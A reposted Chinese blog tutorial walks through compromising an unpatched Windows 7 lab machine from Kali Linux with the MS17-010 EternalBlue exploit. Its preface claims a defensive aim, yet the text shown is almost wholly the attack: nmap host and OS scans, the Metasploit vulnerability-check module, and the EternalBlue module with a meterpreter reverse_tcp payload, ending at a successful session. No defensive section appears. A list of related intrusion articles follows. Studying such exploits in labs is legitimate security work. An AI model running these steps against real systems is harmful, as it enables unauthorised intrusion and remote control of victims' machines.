kali入侵win7(转载)
前言:
本文的目的并不是教会学者入侵win7主机,
而是被入侵之后怎么反制并且做好下一步的防范
以及查到攻击者的蛛丝马迹
攻击原理:
利用未修复永恒之蓝的445端口漏洞入侵目标主机
演示设备:
主机 | IP |
kali Linux | 10.11.4.3 |
Windows7 | 10.11.4.152 |
(win7条件为无防火墙,无杀软)
攻击前准备:
- 扫描目标网段
- 扫描目标IP
- 使用msf工具的aux模块来测试目标是否能被正常攻击
1.1)--->扫描目标网段
开启kali终端输入
nmap -sP 10.11.4.0/24
nmap的参数-sP较为快速,意为进行ping扫描,打印出对扫描做出响应的主机,但不做进一步测试(如端口扫描或者操作系统探测)。
得到结果为
得到两个IP地址,一个为本机kali的IP地址10.11.4.3,另一个则为win7的IP地址10.11.4.152
1.2)--->扫描目标IP
在kali终端输入nmap -O 10.11.4.152
nmap的参数-O为系统类型扫描,同样会列出端口详细信息。
得到结果为:
可以看到要利用的445端口为open,即打开状态
1.3)--->使用msf工具的aux模块来测试目标是否能被正常攻击
输入msfconsole进入到msf工具
每次打开msf工具的图案都不相同,无须担心
搜寻相关的攻击辅助模块以及攻击模块
输入:
search ms17
得到:
第1个为扫描检测漏洞辅助模块(下标为1),第2个为要使用的攻击模块(eternalblue永恒之蓝)
加载扫描检测漏洞辅助模块
输入:
use auxiliary/scanner/smb/smb_ms17_010
得到:
进入到加载扫描检测漏洞辅助模块
检测需要传入什么参数
只需传入rhost
在这需要传入的参数比较简单,传入要被检测的目标IP即可
输入:
set rhost 10.11.4.152
得到:
传入rhost
接着执行这个已经设置好参数的探测模块
输入:
run
得到:
翻译为: 主机很可能容易受到MS17-010的!-Windows 7终极7601服务包1x64(64位)
Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
主机很可能容易受到MS17-010的!-Windows 7终极7601服务包1x64(64位)
至此已成功一大半,下面让我们进行对目标主机的攻击
- 进入攻击模
- 查看参数并传入参数
- 执行攻击
2.1)--->进入攻击模块
输入:
use exploit/windows/smb/ms17_010_eternalblue
得到:
2.2)--->查看参数并传入参数
输入:
show options
得到:
需要设置的参数为payload(攻击载荷),rhost(目标IP)
输入:
set payload windows/x64/meterpreter/reverse_tcp
得到:
payload只需要配置监听返回会话的IP
输入:
set rhosts 10.11.4.152
得到:
设置目标IP
2.3)--->执行攻击
输入:
exploit
得到:
如果网络不好的话会在这里卡一会,或者目标系统有杀软的话,就会卡在这里
出现最下面的=-=-=-WIN=-=-=-就代表已成功拿到权限
kali入侵win7(转载)相关推荐
- 渗透测试-Kali入侵Win7主机
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的 Win 7主机,从而 ...
- Metasploit入侵win7系统
Metasploit入侵win7系统 一:实验环境 二:获得信息 a.获得网络拓扑图 b.获得主机ip和目标ip 三:实施入侵 a.打开控制终端 b.查找漏洞 c.进行配置 四:对主机进行操作 五:做 ...
- kali利用MSF对ms17_010漏洞入侵win7
步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...
- 记一次MSF永恒之蓝入侵win7系统实验
目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目 ...
- kali入侵windows
因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门. ####实验环境 ![实验环境.jpg](h ...
- kali入侵内网电脑和入侵外网电脑
生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵) 第一步:输入msfvenom命令生成一个payload,相关参数与命令如下: -p:使用反向远程控制程序"windows/ ...
- ms17_010 入侵Win7
一.win7镜像的下载 二.进入msfconsole ┌──(root㉿kali-2002)-[~] └─# msfconsole 等待一会儿,出现 msf6> 即为进入成功 三.查找漏洞 ...
- Kali入侵Windows主机
一.测试环境 Kali Linux 172.16.11.222 Windows主机 172.16.11.230 二.木马生成 在 Kali 终端输入以下命令生成木马文件QQ.exe msfvenom ...
- 网站服务器取证案例,教你如何通过服务器日志进行入侵取证(转载)
转载自:网卫大学堂 http://www.wwdxt.com/ 日志文件默认位置: 应用程序日志.安全日志.系统日志.DNS日志默认位置:%systemroot%/system32/config, 默 ...
最新文章
- Apache常见功能实战详解
- Objective-C:MRC(引用计数器)在OC内部的可变对象是适用的,不可变对象是不适用的(例如 NSString、NSArray等)...
- [LeetCode] 102. Binary Tree Level Order Traversal_Medium tag: BFS
- P2 Matlab计算基础-《Matlab/Simulink与控制系统仿真》程序指令总结
- docker学习系列14 使用haproxy实现mysql集群的负载均衡...
- mysql数据库设计规范_MYSQL数据库设计规范与原则
- c语言怎么让图形界面单独显示,「分享」C语言如何编写图形界面
- Ubuntu16.04 SSH 免密登录
- Undefined control sequence. \makecover
- Python hashlib模块中的sha加密
- java8中字符串常量以及GC相应处理机制
- python自定义安装哪些不需要_python setup.py配置,用于在自定义目录中安装文件
- Elasticsearch集群配置以及REST API使用
- vs code安装使用ESLint,typescript
- 4.linux基础1
- JQuery提交表单form
- 超薄内置DSP数字功放芯片
- 新浪微博开放平台使用
- java源文件只能有一import_Java源文件的声明规则
- Win Server 2008 R2
热门文章
- 如何防止黑客入侵:保护计算机安全的 7 种方法
- 2021/06/29计算机视觉期末复习笔记整理
- JAVA开发学习——欢迎来到JAVA开发世界!
- Android小应用:余额宝万份收益查询小工具
- 用matlab代码实现QDA,matlab数据库
- 典型的Top K算法_找出一个数组里面前K个最大数
- sql server 64位导入数据源中没有excel_【超级软件】PDFXEdit7Portable x32/64位
- excel中批量删除公式,保留数值
- PB修改源码时报错:C0176: Badly ordered TYPE and VARIABLE declarations. Is this modified exported source?
- 工业互联的未来发展趋势